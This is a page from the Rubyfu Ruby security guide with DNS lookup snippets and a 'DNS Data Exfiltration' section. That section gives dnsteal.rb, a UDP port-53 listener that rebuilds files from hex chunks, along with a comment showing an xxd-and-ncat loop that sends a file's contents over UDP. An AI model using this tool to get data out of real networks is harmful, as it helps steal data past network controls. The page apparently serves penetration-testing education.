DNS - Rubyfu

Twitter Github NEW! Black Hat Ruby Buy Me a Coffee

Search…

DNS

DNS lookup
Forward DNS lookup (Host to IP)
1
require 'resolv'
2
Resolv.getaddresses "rubyfu.net"
Copied!
Returns array of all IPs
1
["23.23.122.48", "107.20.161.48", "174.129.41.187"]
Copied!
or use Resolv.getaddress to get one address only
Reverse DNS lookup (IP to Host)
1
require 'resolv'
2
Resolv.getnames "23.23.122.48"
Copied!
Returns array of all hostnames, if PTR is assigned
1
["ec2-174-129-41-187.compute-1.amazonaws.com"]
Copied!
or use Resolv.name to get one name only
DNS Data Exfiltration
DNS out-band connection is usually allowed in local networks, which is the major benefits of using DNS to transfer data to external server.
dnsteal.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# for hex in $(xxd -p ethernet-cable.jpg); do echo $hex | ncat -u localhost 53 ; done
4
# 
5
require 'socket'
6
​
7
if ARGV.size < 1
8
  puts "[+] sudo ruby #{__FILE__} <FILENAME>"
9
  exit
10
else
11
  file = ARGV[0]
12
end
13
​
14
# Open UDP Socket and bind it to port 53 on all interfaces
15
udpsoc = UDPSocket.new
16
udpsoc.bind('0.0.0.0', 53)
17
​
18
begin
19
​
20
  data     = ''
21
  data_old = ''
22
​
23
  loop do
24
    response = udpsoc.recvfrom(1000)
25
    response = response[0].force_encoding("ISO-8859-1").encode("utf-8")
26
    data = response.match(/[^<][a-f0-9]([a-f0-9]).*[a-f0-9]([a-f0-9])/i).to_s
27
​
28
    # Write received data to file
29
    File.open(file, 'a') do |d|
30
      d.write [data].pack("H*") unless data == data_old     # Don't write the same data twice(poor workaround)
31
      puts data unless data == data_old
32
    end
33
​
34
    data_old = data 
35
  end
36
​
37
rescue Exception => e
38
  puts e
39
end
Copied!
Run it
1
ruby dnsteal.rb image.jpg
Copied!
​dnsteal.py​

Nessus

DNS Enumeration

Copy link

Contents

DNS lookup

Forward DNS lookup (Host to IP)

Reverse DNS lookup (IP to Host)

DNS Data Exfiltration